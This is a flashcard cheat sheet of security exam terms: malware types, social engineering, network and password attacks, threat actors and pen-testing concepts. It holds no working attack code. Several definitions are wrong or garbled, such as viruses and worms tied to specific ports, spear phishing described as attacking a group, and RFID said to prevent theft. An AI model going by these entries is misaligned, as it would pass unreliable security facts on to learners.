Cheat Sheet Flashcards
Virus
replicates using port 1900
Polymorphic virus
mutates, as does its hash value
Ransomware
asks for money; could be subtle
Worm
spreads using port 5000
Trojan
could change .dll files
Rootkit
upon reinstalling the OS, it is still there; in Linux, look for the bash shell as a path
Keylogger
logs keystrokes
Adware
uses popups
Bots
infected machine used as an attack vector
RAT
sends back passwords to the hacker, who then logs in
Logic bomb
needs a trigger, such as time
Phishing
uses email; targets one person
Spear phishing
attacks a group; look for plurals in the question
Whaling
attacks CEO or high‐level executives
Vishing
uses a telephone or leaves a voicemail
Tailgating
follows someone through; does not use credentials
Impersonating
pretends to be from the help desk or IT team
Dumpster diving
pulls information from the trash bin
Shoulder surfing
someone looks over an employee’s shoulder or uses a smartphone to video your bank transaction
Watering hole
infects a trusted website
Authority
email from CEO or HR; asks you to fill in a form
Urgency
letting a fireman into the server room
DoS
one host taking out another
DDoS
multiple hosts taking out one host
Man‐in‐the middle
interception attack data in real time
Replay
interception attack data replayed at a later date
Kerberos
prevents replay and pass‐the‐hash attacks
Buffer overflow
too much data in a field
Integer overflow
too large a number in a data field
XSS
uses HTML tags/JavaScript; no authentication
XSRF/CSRF
asks you to click on an icon and provide authentication
Privilege escalation
tries to get admin rights
ARP poisoning
prevented by using static entries in the arp cache—for example, arp ‐s
DNS poisoning
prevented by using DNSSEC that produces RRSIG records
ARP
local LAN attack
Man‐in‐the‐browser
trojan already installed; after bank transactions; URL does not change
Zero‐day virus
cannot be detected other than baseline; takes more time to get antidote.
Pass‐the‐hash
attacks NTLM authentication; prevented by disabling NTLM or using Kerberos
Session hijacking
steals your cookies
Evil twin
looks like a legitimate WAP
Rogue AP
free; steals information; prevented by using 802.1x
Jamming
interference attack
WPS
push the button; brute-force attacks underlying password
Bluejacking
hijacks Bluetooth phone; sends text messages
Bluesnarfing
steals contacts from Bluetooth phone
RFID
prevents theft of small devices
NFC
wireless payment; short range
Birthday
hash-collision attack; digital signatures vulnerable
Disassociation attacks
prevents access to the WAP
Rainbow tables
precomputed list of passwords and hashes; used for hash-collision attacks
Dictionary
password; prevented by using a random character in your password or misspelling your password
Brute force
every available combination; prevents account lockout low value or salt password
Collison
matches hashes
Weak implementation
uses WEP; better to use WPA2‐CCMP as it is the strongest
Downgrade
uses legacy SSL rather than TLS; POODLE is a classic example
Script kiddie
purchases scripts and programs, probably from the dark web
Hacktivist
politically motivated agent
Nation state/APT
foreign government agent
Organized crime
profit-driven agent who will blackmail you
Competitors
steals your trade secrets; beats you to market with your product
Insider
known as a malicious insider; hardest to detect
Intrusive
can cause damage
Black box
knows nothing
White box
knows everything
Gray box
has at least one piece of information—for example, a password or diagram
Fuzzing
enters random characters into an application for spurious results; black-/white-box pen testers use it
Pivot
accesses a network through a vulnerable host, then attacks a secondary, more important host
Initial exploitation
where pen testing starts
Escalation of privileges
obtains admin rights
Intrusive scan
used in pen testing; can cause damage to your system
Passive
no damage
Credentialed
admin rights; more information; audit files; account and certificate information
Non‐credentialed
low level; finds missing patches
Race condition
two threads accessing data at the same time
End‐of‐life systems
lack of vendor support; no patches
Error handling
customer side makes error small; IT support error needs all information
Default configuration
changes username or passwords
Untrained users
not complying with policies
Resource exhaustion
running CPU at 100% or running out of memory
Key management
ensures keys signed in and out each day